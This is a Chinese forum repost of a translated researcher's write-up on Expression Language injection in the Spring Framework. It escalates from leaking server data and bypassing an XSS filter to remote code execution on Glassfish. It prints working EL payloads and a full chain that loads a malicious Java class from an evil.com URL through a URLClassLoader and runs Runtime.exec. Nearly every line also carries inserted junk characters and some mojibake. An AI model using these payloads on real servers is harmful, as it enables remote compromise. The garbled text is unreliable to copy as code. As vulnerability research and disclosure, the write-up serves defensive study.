Remote Code with
4 q, u' X3 h. dExpression Language Injection
2 O5 Y# P! T1 \Spring Framework脆弱性—DanAmodio/ n3 o2 ?: `9 g- `
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
0 J' _4 W0 g) N" ~" ]( A可能会存在风险。
2 n: M# ~3 N7 f! u2 r: H在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
6 E$ i1 s+ A* U B$ JArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
# Q3 ^# i, V* A! H, J8 {以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
5 T2 u0 B9 k3 v$ X以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
% I$ V. G; ?8 N& h6 U版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
7 W' [& V6 S7 A1 E由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但+ G! M. h* {" @, x3 x% J: G
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版/ t( a+ o5 y0 r0 c7 {
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
) `8 G6 s* ], ^$ ?5 k4 e这些版本不支持禁用double EL resolution.; w' F' s/ f# R; `* V8 Q
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
! G( r% b8 t9 `, q4 b1 X$ l( uEL2.2容器上可能进行远程代码执行。) ]4 u8 |* r$ }" W H0 U
这是一个原始信息泄露的攻击例子:& W' b9 e, U' X! h
请求:/ g3 j) g2 e9 ]
ttp://vulnerable.com/foo?message=${applicationScope}6 I% v+ m4 r$ o: o7 ?* J" \
到达以下内容页面:
1 M" U2 u8 u, J: |9 E" k结果将输出一些包含内部服务器信息calsspath 和本地工作目录0 O0 }. \. b( x. }
你也可以做一些其他事情,如这样:
$ _" X7 K$ G F3 h1 l% z# J5 z${9999+1}
: l/ X; \8 H/ j* M还可以访问session 对象和beans, {; d( }, l( D" ^, \' q
${employee.lastName}3 S# y/ |9 g* B$ V9 Y
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是# T4 K' m h4 R- K# j9 m
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
4 e- B" f9 n0 `2 t$ O西,比如XSS./ [* V3 h3 ~$ B+ v. ]( E" }0 F
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
2 D7 j; ?- {+ G, e# u( O/ v! A突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
" u( y6 }) |+ c4 F$ ^呢?”
8 _. Z9 {* S+ J/ Z Y" g) X因此,我尝试巳缦拢�
4 Q- R- |7 V# G! ~. |5 ihttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
5 r( M( `- N2 W$ F0 ZP) G# a& S/ n3 C1 Y: e- N1 O
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返6 Q4 O: d- S5 n
回的文本被插入进了spring:message 标签。
4 G. i: A& a, a' e6 g7 A' }+ L6 [! w这里是一个最终绕过过滤的实例:
# {7 G# ?- G' M5 v( B& I6 Rhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ5 i+ z3 ` v# E' Y
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为7 A5 k% I6 n0 b
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?1 p! c( E9 O" e+ b1 z6 Q
经过一番研究,我学习到EL2.2 增加了方法调用。
# r% M; K/ E" R1 X; [我写了一个快速测试应用程序代码并且检测一些功能, V" L q/ C$ x% W& f2 g
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
5 f# [; k. ], |5 E, D Y( v! @8 r${pageContext.request.getSession().setAttribute(“admin”,true)}
3 {) Y+ b, w k) C3 o7 t$ d8 D好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的4 G1 F7 O; l4 a& A3 B9 N) I
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?+ q) [- [8 {. W: [, ^- O: _
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1$ R B2 a: {0 E3 K
“, 1234)}
" h) ~6 o0 X4 Q' n# [, j4 _3 I0 B/ [${“”.getClass().forName(“java.lang.Runtime”)}
8 p( d t( l4 A/ a0 R2 g哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不& B! W$ A" ~, M$ N% M% u8 i Q! w
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
9 c, b7 h/ A1 N+ J+ Q+ Y数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
1 Z7 }: g" i" V! A一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
2 y% O- j; \% @$ j方法签名invoke(Object obj, Object„ args)$ B" u0 F m! r! c
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问9 K7 F8 i6 k0 e4 s7 ?3 ~/ |
题,以让它可以工作起来。
0 W2 r: V- F" y' _漏洞利用:& r! [ b+ v/ A% _
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
* f. @8 ^$ H' ^' f希望你们中的一些JAVA奇才告诉我我是如此的可笑。
5 T; ]9 X! L4 M/ M% a; i! w这里有一些我试过的失败的用例,为了试图让它工作的用例:
9 f: s1 J3 X$ p! F 写文件到文件系统
) Q" i7 @$ e5 c& f4 Y 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
: M. }3 t8 m0 N8 @- O; I! k我认为这些可以很好的工作,但是我不能找到合适的类来载入。
& h! Q1 i8 m3 C5 f B${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
' ?, k1 K9 u- v: B* d) M2 F: rjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
- C7 }( G* m/ t) corg.springframework.expression.spel.standard.SpelExpressionParser not found3 k! X: h; C/ Q
by
/ t# e* E4 n7 f0 H5 \9 {! i" sorg.glassfish.web.javax.servlet.jsp [194].( t; c. O# b1 F; d0 K
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public2 j3 A3 ` r; h2 m6 J( H/ K& e% O
利用反射来创建一个新的Runtime(and watch the world burn)/ P$ R1 A; R0 v3 \4 |* }
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
, Z/ w2 g. Z- T1 p0 D* q, u B(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
: g5 a. s2 ~4 J6 K+ g0 T3 Q${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}) W9 ?' U. P# c: w
使用java.lang.ProcessBuilder
3 ]5 U& L/ n7 W, O 用表达式语言来评估表达式语言
% [2 c8 B. ?% P! q6 kExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.4 V8 [3 ?! a, x5 \1 ]1 S" s
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request P2 J3 q1 r: U/ O; o. {
“,”".getClass(),null)}' P& _3 W6 M0 U9 l3 P! ^
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
7 u6 S$ y8 e- i: Q; M8 U& `我在使用一个空数组通过Method.invoke()时失败了很多次4 ^4 r, ]! [7 r2 C7 B0 E
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
, Z7 d" S+ Y+ b, i.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A8 m/ \; E; x) S' S2 Z: c
rrayList”).newInstance().toArray())! j; T2 J. s) X6 w
java.lang.IllegalArgumentException: wrong number of arguments8 {1 b$ z# n9 R8 S% X8 `" y5 h
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
3 L2 G( l: w, h" z6 J以创建一个恶意class文件并且指向类装载器.$ G' q8 k8 I- e, n
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:& o4 y; ~' o, Z ?+ D! u) F- b
public class Malicious {
1 t3 I2 Y3 m: }! i6 Z/ cpublic Malicious() {8 x! H3 x f# E0 `6 l4 o) [
try {, ^' u3 [0 U r
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
) M8 j& j4 M! y, tjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win1 X" L% X% a! p$ J2 T& j
} catch (Exception e) {2 t" j* Z X3 o/ G* l( H4 H7 d2 b
} j7 C9 t& s; y# D* u& |4 ?) _0 t* R
}
" M& Q7 V. B" k4 p1 J& J/ y我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回* b, {0 J* e7 K5 k2 \& U# k
话中,因此它可以被使用.
2 J$ ^, X/ b+ K5 e${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName. z+ X3 Z G( I( G6 c
(“java.util.ArrayList”).newInstance())}
. r* L; P9 k) n. J1 }; n4 XURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建" i% x" ]+ l( l, I
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
+ o! Z) u5 y7 S& V$ hgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个, C0 Y" j* ^3 \) O1 C
我们可以调用的create(string)方法,然后转换对一个URL对象。: v- t7 a- j' f0 B& Z2 C/ S
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
# l% y: f4 S7 L6 |ere/malicious/classfile/is/located/”).toURL())}5 l2 k9 Q$ N" \/ j
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,: R4 I" ~3 \9 X+ g. h
恶意类文件被装载并创建,触发远程代码.
$ h- K0 B: _* n${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte. a$ B5 X' r5 M
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().' Z/ r4 f3 C' v0 q# b( }
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
/ |! @ A/ u4 V+ ]()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对